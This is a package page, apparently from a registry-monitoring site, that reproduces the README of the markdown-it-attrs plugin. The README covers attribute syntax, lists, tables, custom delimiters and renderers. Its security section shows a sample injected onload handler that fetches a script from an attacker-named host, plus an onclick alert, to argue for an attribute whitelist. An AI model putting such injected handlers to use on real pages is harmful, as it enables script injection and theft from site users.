Research
Security News
Quasar RAT Disguised as an npm Package for Detecting Vulnerabilities in Ethereum Smart Contracts
Socket researchers uncover a malicious npm package posing as a tool for detecting vulnerabilities in Etherium smart contracts.
markdown-it-attrs
Advanced tools
Add classes, identifiers and attributes to your markdown with {} curly brackets, similar to pandoc's header attributes
Add classes, identifiers and attributes to your markdown with {.class #identifier attr=value attr2="spaced value"}
curly brackets, similar to pandoc's header attributes.
Example input:
# header {.style-me}
paragraph {data-toggle=modal}
Output:
<h1 class="style-me">header</h1>
<p data-toggle="modal">paragraph</p>
Works with inline elements too:
paragraph *style me*{.red} more text
Output:
<p>paragraph <em class="red">style me</em> more text</p>
And fenced code blocks:
```python {data=asdf}
nums = [x for x in range(10)]
```
Output:
<pre><code data="asdf" class="language-python">
nums = [x for x in range(10)]
</code></pre>
You can use ..
as a short-hand for css-module=
:
Use the css-module green on this paragraph. {..green}
Output:
<p css-module="green">Use the css-module green on this paragraph.</p>
Also works with spans, in combination with the markdown-it-bracketed-spans plugin (to be installed and loaded as such then):
paragraph with [a style me span]{.red}
Output:
<p>paragraph with <span class="red">a style me span</span></p>
$ npm install --save markdown-it-attrs
Library is considered done from my part. I'm maintaining it with bug fixes and security updates.
I'll approve pull requests that are easy to understand. Generally not willing merge pull requests that increase maintainance complexity. Feel free to open anyhow and I'll give my feedback.
If you need some extra features, I'm available for hire.
var md = require('markdown-it')();
var markdownItAttrs = require('markdown-it-attrs');
md.use(markdownItAttrs, {
// optional, these are default options
leftDelimiter: '{',
rightDelimiter: '}',
allowedAttributes: [] // empty array = all attributes are allowed
});
var src = '# header {.green #id}\nsome text {with=attrs and="attrs with space"}';
var res = md.render(src);
console.log(res);
A user may insert rogue attributes like this:
![](img.png){onload=fetch('https://imstealingyourpasswords.com/script.js').then(...)}
If security is a concern, use an attribute whitelist:
md.use(markdownItAttrs, {
allowedAttributes: ['id', 'class', /^regex.*$/]
});
Now only id
, class
and attributes beginning with regex
are allowed:
text {#red .green regex=allowed onclick=alert('hello')}
Output:
<p id="red" class="green" regex="allowed">text</p>
markdown-it-attrs relies on markdown parsing in markdown-it, which means some
special cases are not possible to fix. Like using _
outside and inside
attributes:
_i want [all of this](/link){target="_blank"} to be italics_
Above example will render to:
<p>_i want <a href="/link">all of this</a>{target="<em>blank"} to be italics</em></p>
...which is probably not what you wanted. Of course, you could use *
for
italics to solve this parsing issue:
*i want [all of this](/link){target="_blank"} to be italics*
Output:
<p><em>i want <a href="/link" target="_blank">all of this</a> to be italics</em></p>
When class can be applied to both inline or block element, inline element will take precedence:
- list item **bold**{.red}
Output:
<ul>
<li>list item <strong class="red">bold</strong></li>
<ul>
If you need the class to apply to the list item instead, use a space:
- list item **bold** {.red}
Output:
<ul>
<li class="red">list item <strong>bold</strong></li>
</ul>
If you need the class to apply to the <ul>
element, use a new line:
- list item **bold**
{.red}
Output:
<ul class="red">
<li>list item <strong>bold</strong></li>
</ul>
If you have nested lists, curlys after new lines will apply to the nearest <ul>
or <ol>
. You may force it to apply to the outer <ul>
by adding curly below on a paragraph by its own:
- item
- nested item {.a}
{.b}
{.c}
Output:
<ul class="c">
<li>item
<ul class="b">
<li class="a">nested item</li>
</ul>
</li>
</ul>
This is not optimal, but what I can do at the momemnt. For further discussion, see https://github.com/arve0/markdown-it-attrs/issues/32.
Similar for tables, attributes must be two new lines below:
header1 | header2
------- | -------
column1 | column2
{.special}
Output:
<table class="special">
<thead>
<tr>
<th>header1</th>
<th>header2</th>
</tr>
</thead>
<tbody>
<tr>
<td>column1</td>
<td>column2</td>
</tr>
</tbody>
</table>
Wellformed the table's rowspan and/or colspan attributes, usage sample below:
| A | B | C | D |
| ----------------------- | --- | --- | ---------------- |
| 1 | 11 | 111 | 1111 {rowspan=3} |
| 2 {colspan=2 rowspan=2} | 22 | 222 | 2222 |
| 3 | 33 | 333 | 3333 |
{border=1}
Output:
<table border="1">
<thead>
<tr>
<th>A</th>
<th>B</th>
<th>C</th>
<th>D</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>11</td>
<td>111</td>
<td rowspan="3">1111</td>
</tr>
<tr>
<td colspan="2" rowspan="2">2</td>
<td>22</td>
</tr>
<tr>
<td>3</td>
</tr>
</tbody>
</table>
If you need finer control, decorate might help you.
If you would like some other output, you can override renderers:
const md = require('markdown-it')();
const markdownItAttrs = require('markdown-it-attrs');
md.use(markdownItAttrs);
// custom renderer for fences
md.renderer.rules.fence = function (tokens, idx, options, env, slf) {
const token = tokens[idx];
return '<pre' + slf.renderAttrs(token) + '>'
+ '<code>' + token.content + '</code>'
+ '</pre>';
}
let src = [
'',
'```js {.abcd}',
'var a = 1;',
'```'
].join('\n')
console.log(md.render(src));
Output:
<pre class="abcd"><code>var a = 1;
</code></pre>
Read more about custom rendering at markdown-it.
markdown-it-attrs
will add attributes to any token.block == true
with {}-curlies in end of token.info
. For example, see markdown-it/rules_block/fence.js which stores text after the three backticks in fenced code blocks to token.info
.
Remember to render attributes if you use a custom renderer.
To use different delimiters than the default, add configuration for leftDelimiter
and rightDelimiter
:
md.use(attrs, {
leftDelimiter: '[',
rightDelimiter: ']'
});
Which will render
# title [.large]
as
<h1 class="large">title</h1>
Tests are in test.js.
Run all tests:
npm test
Run particular test:
npm test -- -g "not crash"
In tests, use helper function replaceDelimiters
to make test run with
different delimiters ({}
, []
and [[]]
).
For easy access to HTML output you can use debug.js:
node debug.js # will print HTML output
Please do not submit pull requests with changes in package version or built files like browser.js.
MIT © Arve Seljebu
FAQs
Add classes, identifiers and attributes to your markdown with {} curly brackets, similar to pandoc's header attributes
The npm package markdown-it-attrs receives a total of 34,861 weekly downloads. As such, markdown-it-attrs popularity was classified as popular.
We found that markdown-it-attrs demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 0 open source maintainers collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Research
Security News
Socket researchers uncover a malicious npm package posing as a tool for detecting vulnerabilities in Etherium smart contracts.
Security News
Research
A supply chain attack on Rspack's npm packages injected cryptomining malware, potentially impacting thousands of developers.
Research
Security News
Socket researchers discovered a malware campaign on npm delivering the Skuld infostealer via typosquatted packages, exposing sensitive data.